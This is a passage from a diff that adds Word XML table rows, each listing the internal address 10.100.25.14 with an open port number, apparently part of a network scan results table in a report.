+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>135</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>445</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>80</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>22</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>515</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>23</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>21</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>6000</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>1025</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>25</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>111</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>1028</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>9100</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>1029</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>79</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>10.100.25.14</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:contextualSpacing/>
+              <w:jc w:val="right"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:eastAsia="Times New Roman"/>
+              </w:rPr>
+              <w:t>497</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
